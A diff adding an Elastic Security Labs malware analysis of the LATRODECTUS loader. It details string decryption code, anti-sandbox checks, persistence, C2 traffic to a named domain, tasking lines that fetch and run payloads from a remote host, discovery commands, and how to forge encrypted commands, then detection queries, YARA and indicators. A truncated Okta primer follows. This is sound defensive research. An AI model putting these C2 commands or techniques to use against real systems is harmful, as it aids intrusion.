Below is the algorithm implemented in Python using our [nightMARE framework](https://github.com/elastic/labs-releases/tree/main/nightMARE):\n\n``` python\ndef decrypt_string(encrypted_bytes: bytes) -> bytes:\n x = cast.u32(encrypted_bytes[:4])\n y = cast.u16(encrypted_bytes[4:6])\n byte_size = cast.u16(cast.p32(x ^ y)[:2])\n decoded_bytes = bytearray(byte_size)\n\n for i, b in enumerate(encrypted_bytes[6 : 6 + byte_size]):\n decoded_bytes[i] = ((x + i + 1) ^ b) % 256\n\n return bytes(decoded_bytes)\n```\n\n### Runtime API\n\nLATRODECTUS obfuscates the majority of its imports until runtime. At the start of the program, it queries the PEB in combination with using a CRC32 checksum to resolve ```kernel32.dll``` and ```ntdll.dll``` modules and their functions. In order to resolve additional libraries such as ```user32.dll``` or ```wininet.dll```, the malware takes a different approach performing a wildcard search (```*.dll```) in the Windows system directory. It retrieves each DLL filename and passes them directly to a CRC32 checksum function. \n\n\n\n\n### Anti-analysis\nWhen all the imports are resolved, LATRODECTUS performs several serial anti-analysis checks. The first monitors for a debugger by looking for the BeingDebugged flag inside the Process Environment Block (PEB). If a debugger is identified, the program terminates.\n\n\n\n\nIn order to avoid sandboxes or virtual machines that may have a low number of active processes, two validation checks are used to combine the number of running processes with the OS product version. 
\n\n\n\n\nIn order to account for the major differences between Windows OS versions, the developer uses a custom enum based on the major/minor version, and build numbers within Windows.\n\n\n\n\nThe two previous conditions translate to:\n\n - LATRODECTUS will exit if the number of processes is less than 75 and the OS version is a recent build such as Windows 10, Windows Server 2016, or Windows 11\n - LATRODECTUS will exit if the number of processes is less than 50 and the OS version is an older build such as Windows Server 2003 R2, Windows XP, Windows 2000, Windows 7, Windows 8, or Windows Server 2012/R2\n\nAfter the sandbox check, LATRODECTUS verifies if the current process is running under WOW64, a subsystem of Windows operating systems that allows for 32-bit applications to run on 64-bit systems. If true (running as a 32-bit application on a 64-bit OS), the malware will exit.\n\n\n\n\nThe last check is based on verifying the MAC address via the ```GetAdaptersInfo()``` call from ```iphlpapi.dll```. If there is no valid MAC Address, the malware will also terminate.\n\n\n\n\n### Mutex\n\nThis malware uses the string ```runnung``` as the mutex to prevent re-infection on the host, which may be an accidental typo on the part of developers.\n\n\n\n\n### Hardware ID\n\nAfter the mutex creation, LATRODECTUS will generate a hardware ID that is seeded from the volume serial number of the machine in combination with multiplying a hard-coded constant (```0x19660D```).\n\n\n\n\n### Campaign ID\n\nAt this stage, the decrypted campaign name (```Littlehw```) from our sample is used as a seed passed into a Fowler–Noll–Vo hashing [function](https://en.wikipedia.org/wiki/Fowler%E2%80%93Noll%E2%80%93Vo_hash_function). 
This will produce a hash that is used by the actor to track different campaigns and associated victim machines.\n\n\n\n\n### Setup / persistence\n\nThe malware will generate a folder path using a configuration parameter that determines the location where LATRODECTUS will be dropped on disk, such as the following directories:\n - ```AppData```\n - ```Desktop```\n - ```Startup```\n - ```Personal```\n - ```Local\\AppData```\n\nOur sample was configured with the ```AppData``` location using a hard-coded directory string ```Custom_update``` along with a hard-coded filename ```Update_``` concatenated with digits seeded from the volume serial number. Below is the full file path inside our VM:\n\n```\nC:\\Users\\REM\\AppData\\Roaming\\Custom_update\\Update_88d58563.dll\n```\n\nThe malware will check for an existing file ```AppData\\Roaming\\Custom_update\\update_data.dat``` to read from, and if the file does not exist it will create the directory before writing a copy of itself in the directory.\n\n\n\n\nAfter the file is copied, LATRODECTUS retrieves two C2 domains from the global configuration, using the previously-described string decryption function.\n\n\n\n\nBefore the main thread is executed for command dispatching, LATRODECTUS sets up a scheduled task for persistence using the Windows Component Object Model (COM). \n\n\n\n\nIn our sample, the task name is hardcoded as ```Updater``` and scheduled to execute upon successful logon.\n\n\n\n\n### Self-deletion\n\nSelf-deletion is one noteworthy technique incorporated by LATRODECTUS. It was [discovered](https://x.com/jonasLyk/status/1350401461985955840) by Jonas Lykkegaard and implemented by Lloyd Davies in the delete-self-poc [repo](https://github.com/LloydLabs/delete-self-poc). The technique allows LATRODECTUS to delete itself while the process is still running using an alternate data stream. 
\n\nElastic Security Labs has seen this technique adopted in malware such as the [ROOK](https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/#anti-detection-alternate-data-streams) ransomware family. The likely objective is to hinder incident response processes by interfering with collection and analysis. The compiled malware contains a [string](https://github.com/LloydLabs/delete-self-poc/blob/49fe92218fdcfe8e173aa60a9eb307bae07cb027/main.h#L10) (```:wtfbbq```) present in the repository.\n\n\n\n\nThis technique is observed at the start of the infection as well as when the malware performs an update using event handler #15. Elastic Security Labs has created a [CAPA rule](https://github.com/mandiant/capa-rules/blob/master/anti-analysis/anti-forensic/self-deletion/self-delete-using-alternate-data-streams.yml) to help other organizations identify this behavior generically when analyzing various malware.\n\n### Communication\n\nLATRODECTUS encrypts its requests using base64 and RC4 with a hardcoded password of ```12345```. 
The first POST request over HTTPS includes victim information along with configuration details, registering the infected system.\n\n```\nPOST https://aytobusesre.com/live/ HTTP/1.1\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\nHost: aytobusesre.com\nContent-Length: 256\nCache-Control: no-cache\n\nM1pNDFh7flKrBaDJqAPvJ98BTFDZdSDWDD8o3bMJbpmu0qdYv0FCZ0u6GtKSN0g//WHAS2npR/HDoLtIKBgkLwyrIh/3EJ+UR/0EKhYUzgm9K4DotfExUiX9FBy/HeV7C4PgPDigm55zCU7O9kSADMtviAodjuRBVW3DJ2Pf5+pGH9SG1VI8bdmZg+6GQFpcFTGjdWVcrORkxBjCGq3Eiv2svt3+ZFIN126PcvN95YJ0ie1Puljfs3wqsW455V7O\n```\n\n\n\nBelow is an example of the decrypted contents sent in the first request:\n\n```\ncounter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&mac=00:0c:24:0e:29:85;&computername=DESKTOP-3C4ILHO&domain=-\n```\n\n| Name | Description |\n| ---- | ----------- |\n| counter | Number of C2 requests; increments by one for each callback |\n| type | Type of request (registration, etc.) |\n| guid | Generated hardware ID seeded by volume serial number |\n| os | Windows OS product version |\n| arch | Windows architecture version |\n| username | Username of infected machine |\n| group | Campaign identifier seeded by unique string in binary with FNV |\n| ver | LATRODECTUS version |\n| up | Unknown |\n| direction | C2 domain |\n| mac | MAC address |\n| computername | Hostname of infected machine |\n| domain | Domain belonging to infected machine |\n\nEach request is pipe-delimited by an object type, integer value, and corresponding argument. There are 4 object types which route the attacker-controlled commands (**CLEARURL**, **URLS**, **COMMAND**, **ERROR**). 
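The pipe-delimited tasking format can be handled with a short helper. Below is a minimal sketch (the function and variable names are our own, not taken from the malware) that splits a task into its object type, integer value, and optional argument:

```python
def parse_task(task: str):
    """Split a C2 task like 'COMMAND|12|<url>' into (object_type, value, argument).

    Object types observed: CLEARURL, URLS, COMMAND, ERROR. The trailing
    argument is optional (e.g. CLEARURL carries none).
    """
    parts = task.strip().split("|", 2)
    object_type = parts[0]
    value = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    argument = parts[2] if len(parts) > 2 else None
    return object_type, value, argument
```

For example, `parse_task("COMMAND|12|http://www.meow123.com/test")` returns `("COMMAND", 12, "http://www.meow123.com/test")`.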
\n\n\n\n\nThe main event handlers are passed through the **COMMAND** object type with the handler ID and their respective argument.\n\n```\nCOMMAND|12|http://www.meow123.com/test \n```\n\nThe **CLEARURL** object type is used to delete any configured domains. The **URLS** object type allows the attacker to swap to a new C2 URL. The last object type, **ERROR**, is not currently configured.\n\n\n\n\n### Bot Functionality\n\nLATRODECTUS’s core functionality is driven through its command handlers. These handlers are used to collect information from the victim machine, provide execution capabilities, and configure the implant. We have seen two additional handlers (retrieve processes, desktop listing) added since the initial [publication](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39), which may be a sign that the codebase is still active and changing. \n\n\n| Command ID | Description |\n| ---------- | ----------- |\n| 2 | Retrieve file listing from desktop directory |\n| 3 | Retrieve process ancestry |\n| 4 | Collect system information |\n| 12 | Download and execute PE |\n| 13 | Download and execute DLL |\n| 14 | Download and execute shellcode |\n| 15 | Perform update, restart |\n| 17 | Terminate own process and threads |\n| 18 | Download and execute ICEDID payload |\n| 19 | Increase beacon timeout |\n| 20 | Reset request counter |\n\n#### Desktop listing - command ID (2)\n\nThis command handler will retrieve a list of the contents of the user’s desktop, which the developer refers to as ```desklinks```. This data will be encrypted and appended to the outbound beacon request. 
This is used for enumerating and validating victim environments quickly.\n\n\n\n\n**Example request**:\n\n```\ncounter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&desklinks=[\"OneDrive.lnk\",\"OneNote.lnk\",\"PowerPoint.lnk\",\"Notepad++.lnk\",\"Excel.lnk\",\"Google Chrome.lnk\",\"Snipping Tool.lnk\",\"Notepad.lnk\",\"Paint.lnk\"]\n```\n\n#### Process ancestry - command ID (3)\n\nThis event handler is referenced as **proclist** by the developer where it collects the entire running process ancestry from the infected machine via the **CreateToolhelp32Snapshot** API. \n\n\n\n\nLike security researchers, malware authors are interested in process parent/child relationships for decision-making. The authors of LATRODECTUS even collect information about process grandchildren, likely to validate different compromised environments.\n\n\n\n\n#### Collect system information - command ID (4)\n\nThis command handler creates a new thread that runs the following system discovery/enumeration commands, each of which is a potential detection opportunity:\n\n``` bash\nC:\\Windows\\System32\\cmd.exe /c ipconfig /all\nC:\\Windows\\System32\\cmd.exe /c systeminfo\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts /all_trusts\nC:\\Windows\\System32\\cmd.exe /c net view /all /domain\nC:\\Windows\\System32\\cmd.exe /c net view /all\nC:\\Windows\\System32\\cmd.exe /c net group \"Domain Admins\" /domain\nC:\\Windows\\System32\\wbem\\wmic.exe /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\nC:\\Windows\\System32\\cmd.exe /c net config workstation\nC:\\Windows\\System32\\cmd.exe /c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed\nC:\\Windows\\System32\\cmd.exe /c whoami /groups\n```\n\nEach output 
is placed into the URI with the corresponding collected data:\n\n```\n&ipconfig=\n&systeminfo=\n&domain_trusts=\n&domain_trusts_all=\n&net_view_all_domain=\n&net_view_all=\n&net_group=\n&wmic=\n&net_config_ws=\n&net_wmic_av=\n&whoami_group=\n```\n\n#### Download and execute PE - command ID (12)\n\nThis handler downloads a PE file from the C2 server, writes the content to disk with a randomly generated file name, then executes the file.\n\n\n\n\nBelow is an example in our environment using this handler:\n\n\n\n\n#### Download and execute DLL - command ID (13)\n\nThis command handler downloads a DLL from the C2 server, writes it to disk with a randomly generated file name, and executes the DLL using rundll32.exe.\n\n\n\n\n#### Download and execute shellcode - command ID (14)\n\nThis command handler downloads shellcode from the C2 server via ```InternetReadFile```, allocates and copies the shellcode into memory, then directly calls it with a new thread pointing at the shellcode.\n\n\n\n\n#### Update / restart - command ID (15)\n\nThis handler appears to perform a binary update to the malware where it’s downloaded, the existing thread/mutex is notified, and then released. The file is subsequently deleted and a new binary is downloaded/executed before terminating the existing process.\n\n\n\n\n#### Terminate - command ID (17)\nThis handler will terminate the existing LATRODECTUS process.\n\n\n\n\n#### Download and execute hosted ICEDID payload - command ID (18)\n\nThis command handler downloads two ICEDID components from a LATRODECTUS server and executes them using a spawned ```rundll32.exe``` process. We haven’t personally observed this being used in the wild, however.\n\nThe handler creates a folder containing two files in the ```AppData\\Roaming\\``` directory. These file paths and filenames are seeded by a custom random number generator which we will review in the next section. 
In our case, this new folder location is: \n\n```\nC:\\Users\\REM\\AppData\\Roaming\\-632116337\n```\n\nIt retrieves a file (```test.dll```) from the C2 server, the standard ICEDID loader, which is written to disk with a randomly-generated file name (```-456638727.dll```).\n\n\n\n\nLATRODECTUS will then perform similar steps by generating a random filename for the ICEDID payload (```1431684209.dat```). Before performing the download, it will set up the arguments to properly load ICEDID. If you have run into ICEDID in the past, this part of the command-line should look familiar: it’s used to call the ICEDID export of the loader, while passing the relative path to the encrypted ICEDID payload file.\n\n```\ninit -zzzz=\"-632116337\\1431684209.dat\"\n```\n\n\n\n\nLATRODECTUS initiates a second download request using a hard-coded URI (```/files/bp.dat```) from the configured C2 server, which is written to a file (```1431684209.dat```). Analyzing the ```bp.dat``` file, researchers identified it as a conventional encrypted ICEDID payload, commonly referenced as ```license.dat```.\n\n\n\n\nAfter decrypting the file, malware researchers noted a familiar 129-byte sequence of junk bytes prepended to the file followed by the custom section headers. \n\n\n\n\nOur team was able to revisit [prior tooling](https://www.elastic.co/security-labs/unpacking-icedid) and successfully decrypt this file, enabling us to rebuild the PE (ICEDID).\n\n\n\n\nAt this point, the ICEDID loader and encrypted payload have been downloaded to the same folder.\n\n\n\nThese files are then executed together using ```rundll32.exe``` via **CreateProcessW** with their respective arguments. Below is the observed command-line:\n\n```\nrundll32.exe C:\\Users\\REM\\AppData\\Roaming\\-632116337\\-456638727.dll,init -zzzz=\"-632116337\\1431684209.dat\"\n```\n\n\n\n\nScanning the ```rundll32.exe``` child process spawned by LATRODECTUS with our ICEDID YARA rule also indicates the presence of ICEDID. 
\n\n\n\n\n#### Beacon timeout - command ID (19)\n\nLATRODECTUS supports jitter for beaconing to C2. This can make it harder for defenders to detect via network sources due to the randomness it introduces into beaconing intervals.\n\n\n\n\nIn order to calculate the timeout, it generates a random number using a seed derived from the user’s cursor position on the screen multiplied by the system’s uptime (```GetTickCount```). This result is passed as a parameter to **RtlRandomEx**. \n\n\n\n\n#### Reset counter - command ID (20)\n\nThis command handler will reset the request counter that is passed on each communication request. For example, on the third callback the counter value is 3. With this function, the developer can reset the count to start again from 0.\n\n```\ncounter=3&type=4&guid=638507385\n```\n\n### LATRODECTUS / ICEDID connection\n\nThere is clearly some kind of development connection or working arrangement between ICEDID and LATRODECTUS. Below are some of the similarities observed:\n - Same enumeration commands in the system discovery handler\n - The DLL exports all point to the same export function address, which was a common observation with ICEDID payloads\n - C2 data is concatenated together as variables in the C2 traffic requests\n - The ```bp.dat``` file downloaded from handler (#18) is used to execute the ICEDID payload via ```rundll32.exe``` \n - The functions appear to be similarly coded\n\n\n\n\nResearchers didn’t conclude that there was a clear relationship between the ICEDID and LATRODECTUS families, though they appear at least superficially affiliated. ICEDID possesses more mature capabilities, like those used for data theft or the [BackConnect](https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol) module, and has been richly documented over a period of several years. 
One hypothesis being considered is that LATRODECTUS is being actively developed as a replacement for ICEDID, and the handler (#18) was included until malware authors were satisfied with LATRODECTUS’ capabilities.\n\n### Sandboxing LATRODECTUS\n\nTo evaluate LATRODECTUS detections, we set up a Flask server configured with the different handlers to instruct an infected machine to perform various actions in a sandbox environment. This method provides defenders with a great opportunity to assess the effectiveness of their detection and logging tools against every capability. Different payloads like shellcode/binaries can be exchanged as needed.\n\n\n\n\nAs an example, for the download and execution of a DLL (handler #13), we can provide the following request structure (object type, handler, arguments for handler) to the command dispatcher:\n\n```\nCOMMAND|13|http://www.meow123.com/dll, ShowMessage\n```\n\nThe following example depicts the RC4-encrypted string described earlier, which has been base64-encoded.\n\n```\nE3p1L21QSBOqEKjYrBKiLNZJTk7KZn+HWn0p2LQfOLWCz/py4VkkAxSXXdnDd39p2EU=\n```\n\nUsing the following CyberChef recipe, analysts can generate encrypted command requests:\n\n\n\n\nUsing the actual malware codebase and executing these different handlers using a low-risk framework, defenders can get a glimpse into the events, alerts, and logs recorded by their security instrumentation. 
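The CyberChef recipe can also be reproduced in a few lines of Python. The sketch below is our own helper (not malware code) implementing plain RC4 with the hardcoded key from this sample; because RC4 is symmetric, the same routine both encrypts command requests and decrypts captured traffic:

```python
import base64

KEY = b"12345"  # hardcoded RC4 password observed in this sample

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are identical."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # pseudo-random generation algorithm
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def encrypt_request(plaintext: bytes) -> str:
    """RC4-encrypt then base64-encode a request body."""
    return base64.b64encode(rc4(KEY, plaintext)).decode()

def decrypt_request(b64_body: str) -> bytes:
    """Base64-decode then RC4-decrypt a captured request body."""
    return rc4(KEY, base64.b64decode(b64_body))
```

For example, `encrypt_request(b"COMMAND|13|http://www.meow123.com/dll, ShowMessage")` produces a base64 blob like the one shown above, and `decrypt_request` reverses it.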
\n\n## Detecting LATRODECTUS\n\nThe following Elastic Defend protection features trigger during the LATRODECTUS malware infection process: \n\n\n\n\nBelow are the prebuilt MITRE ATT&CK-aligned rules with descriptions:\n\n| ATT&CK technique | Elastic Rule | Description |\n| ----- | ----- | ----- |\n| [T1059.007 - JavaScript](https://attack.mitre.org/techniques/T1059/007/) [T1027 - Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/) | [Suspicious Oversized Script Execution](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/execution_oversized_windows_script_execution.toml) | LATRODECTUS is delivered via oversized JavaScript files, on average more than 800KB, filled with random text. |\n| [T1047 - Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/) | [Execution via a Suspicious WMI Client](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/initial_access_execution_via_a_suspicious_wmi_client.toml) | The JavaScript dropper invokes WMI to mount a WebDAV share and invokes msiexec to install a remote MSI file. |\n| [T1218.007 - Msiexec](https://attack.mitre.org/techniques/T1218/007/) | [Remote File Execution via MSIEXEC](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_remote_file_execution_via_msiexec.toml) [Suspicious MsiExec Child Process](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_suspicious_msiexec_child_process.toml) | MSI file hosted on a remote WebDAV share and executed in quiet mode. Once executed, it drops a DLL and launches rundll32 to load it via the Advanced Installer viewer.exe binary. 
|\n| [T1218.011 - Rundll32](https://attack.mitre.org/techniques/T1218/011/) | [Rundll32 or Regsvr32 Loaded a DLL from Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_rundll32_or_regsvr32_loaded_a_dll_from_unbacked_memory.toml) | Rundll32 loads the LATRODECTUS DLL from AppData and starts code injection. |\n| [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/) | [Memory Threat Detection Alert: Shellcode Injection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection) [VirtualProtect API Call from an Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_virtualprotect_api_call_from_an_unsigned_dll.toml) [Shellcode Execution from Low Reputation Module](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_shellcode_execution_from_low_reputation_module.toml) [Network Module Loaded from Suspicious Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml) | Shellcode execution triggers 3 endpoint behavior alerts and a memory threat detection alert. |\n| [T1053.005 - Scheduled Task](https://attack.mitre.org/techniques/T1053/005/) | [Scheduled Task Creation by an Unusual Process](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/persistence_scheduled_task_creation_by_an_unusual_process.toml) | LATRODECTUS may persist using scheduled tasks (rundll32 will create a scheduled task). 
|\n| [T1070.004 - File Deletion](https://attack.mitre.org/techniques/T1070/004/) | [Potential Self Deletion of a Running Executable](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/defense_evasion_potential_self_deletion_of_a_running_executable.toml) | As part of the malware’s DLL self-update command, and also when the DLL is not running from AppData, LATRODECTUS will delete itself while running and restart from the new path or run an updated version of itself, leveraging [this technique](https://github.com/LloydLabs/delete-self-poc). |\n| [T1059.003 - Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/) | [Command Shell Activity Started via RunDLL32](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/execution_command_shell_activity_started_via_rundll32.toml) | LATRODECTUS command ID (4) - collects system information via a series of cmd.exe executions. |\n\nThe following list of hunts and detection queries can be used to detect LATRODECTUS post-exploitation commands focused on execution:\n\n**Rundll32 Download PE/DLL** (command handlers #12, #13 and #18): \n\n``` sql\nsequence by process.entity_id with maxspan=1s\n[file where event.action == \"creation\" and process.name : \"rundll32.exe\" and \n /* PE file header dropped to the InetCache folder */\nfile.Ext.header_bytes : \"4d5a*\" and file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\"]\n[network where process.name : \"rundll32.exe\" and \n event.action : (\"disconnect_received\", \"connection_attempted\") and \n /* network disconnect activity to a public IP address */\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", 
\"192.31.196.0/24\", \"192.52.193.0/24\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\", \"192.168.0.0/16\")]\n```\n\n\n\n\nBelow is an ES|QL hunt to look for long-term and/or high count of network connections by rundll32 to a public IP address (which is uncommon): \n\n``` sql\nfrom logs-endpoint.events.network-*\n| where host.os.family == \"windows\" and event.category == \"network\" and\n network.direction == \"egress\" and process.name == \"rundll32.exe\" and\n/* excluding private IP ranges */\n not CIDR_MATCH(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\"FE80::/10\", \"FF00::/8\")\n| keep source.bytes, destination.address, process.name, process.entity_id, process.pid, @timestamp, host.name\n/* calc total duration and the number of connections per hour */\n| stats count_connections = count(*), start_time = min(@timestamp), end_time = max(@timestamp) by process.entity_id, process.pid, destination.address, process.name, host.name\n| eval duration = TO_DOUBLE(end_time)-TO_DOUBLE(start_time), duration_hours=TO_INT(duration/3600000), number_of_con_per_hour = (count_connections / duration_hours)\n| keep host.name, destination.address, process.name, process.pid, duration, duration_hours, number_of_con_per_hour, count_connections\n| where count_connections >= 100\n```\n\n\n\n\nBelow is a screenshot of Elastic Defend triggering on the LATRODECTUS [memory 
signature](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Latrodectus.yar): \n\n\n\n\n### YARA\n\nElastic Security has created YARA rules to identify [LATRODECTUS](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Latrodectus.yar):\n\n```\nrule Windows_Trojan_LATRODECTUS_841ff697 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-03-13\"\n last_modified = \"2024-04-05\"\n license = \"Elastic License v2\"\n os = \"Windows\"\n arch = \"x86\"\n threat_name = \"Windows.Trojan.LATRODECTUS\"\n reference_sample = \"aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c\"\n\n\n strings:\n $Str1 = { 48 83 EC 38 C6 44 24 20 73 C6 44 24 21 63 C6 44 24 22 75 C6 44 24 23 62 C6 44 24 24 }\n $crc32_loadlibrary = { 48 89 44 24 40 EB 02 EB 90 48 8B 4C 24 20 E8 ?? ?? FF FF 48 8B 44 24 40 48 81 C4 E8 02 00 00 C3 }\n $delete_self = { 44 24 68 BA 03 00 00 00 48 8B 4C 24 48 FF 15 ED D1 00 00 85 C0 75 14 48 8B 4C 24 50 E8 ?? ?? 00 00 B8 FF FF FF FF E9 A6 00 }\n $Str4 = { 89 44 24 44 EB 1F C7 44 24 20 00 00 00 00 45 33 C9 45 33 C0 33 D2 48 8B 4C 24 48 FF 15 7E BB 00 00 89 44 24 44 83 7C 24 44 00 75 02 EB 11 48 8B 44 24 48 EB 0C 33 C0 85 C0 0F 85 10 FE FF FF 33 }\n $handler_check = { 83 BC 24 D8 01 00 00 12 74 36 83 BC 24 D8 01 00 00 0E 74 2C 83 BC 24 D8 01 00 00 0C 74 22 83 BC 24 D8 01 00 00 0D 74 18 83 BC 24 D8 01 00 00 0F 74 0E 83 BC 24 D8 01 00 00 04 0F 85 44 02 00 00 }\n $hwid_calc = { 48 89 4C 24 08 48 8B 44 24 08 69 00 0D 66 19 00 48 8B 4C 24 08 89 01 48 8B 44 24 08 8B 00 C3 }\n $string_decrypt = { 89 44 24 ?? 48 8B 44 24 ?? 0F B7 40 ?? 8B 4C 24 ?? 33 C8 8B C1 66 89 44 24 ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 89 44 24 ?? 33 C0 66 89 44 24 ?? EB ?? 
}\n $campaign_fnv = { 48 03 C8 48 8B C1 48 39 44 24 08 73 1E 48 8B 44 24 08 0F BE 00 8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01 89 04 24 EB BE }\n condition:\n 2 of them\n}\n```\n\n## Observations\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n| --- | --- | --- | --- |\n| aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c | SHA-256 | TRUFOS.DLL | LATRODECTUS |\n| aytobusesre.com | domain | | LATRODECTUS C2 |\n| scifimond.com | domain | | LATRODECTUS C2 |\n| gyxplonto.com | domain | | ICEDID C2 |\n| neaachar.com | domain | | ICEDID C2 |\n\n## References\nThe following were referenced throughout the above research:\n\n - [https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39](https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39)\n - [https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice](https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice)\n\n## Tooling\n[String decryption and IDA commenting tool](https://github.com/elastic/labs-releases/blob/main/tools/latrodectus/latro_str_decrypt.py)\n"
+ },
+ "title": "Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID",
+ "slug": "spring-cleaning-with-latrodectus",
+ "subtitle": "The LATRODECTUS loader evolves to deliver ICEDID and other malware",
+ "date": "2024-05-16",
+ "description": "Elastic Security Labs has observed an uptick in a recent emerging loader known as LATRODECTUS. This lightweight loader packs a big punch with ties to ICEDID and may turn into a possible replacement to fill the gap in the loader market.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "Security Labs Images 16.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "icedid",
+ "latrodectus",
+ "loader"
+ ]
+ },
+ "id": "security_labs_content-spring_cleaning_with_latrodectus-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-starter_guide_to_understanding_okta-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-starter_guide_to_understanding_okta-md.json
new file mode 100644
index 00000000000..91376a98e76
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-starter_guide_to_understanding_okta-md.json
@@ -0,0 +1,25 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Starter guide to understanding Okta\"\nsubtitle: \"An introduction for security analysts\"\nslug: \"starter-guide-to-understanding-okta\"\ndate: \"2024-01-23\"\ndescription: \"This article delves into Okta's architecture and services, laying a solid foundation for threat research and detection engineering. Essential reading for those aiming to master threat hunting and detection in Okta environments.\"\nauthor:\n - slug: terrance-dejesus\nimage: \"photo-edited-09.png\"\ncategory:\n - slug: security-research\n---\n\n# Preamble\nThe evolution of digital authentication from simple, unencrypted credentials to today’s advanced methods underscores the importance of data security. As organizations adopt hybrid deployments and access to critical applications is no longer confined within the network perimeter, additional authentication complexity and risk ensue. The adoption of standard authentication protocols and advanced workflows is mandatory not only to reduce risk but also to maintain operational stability for users who require access to various applications. Okta provides solutions to these inherent industry problems with its comprehensive SaaS platform for Identity and Access Management (IAM) services.\n\nWe will examine Okta's services and solutions in the context of Software-as-a-Service (SaaS) platforms and against the backdrop of the 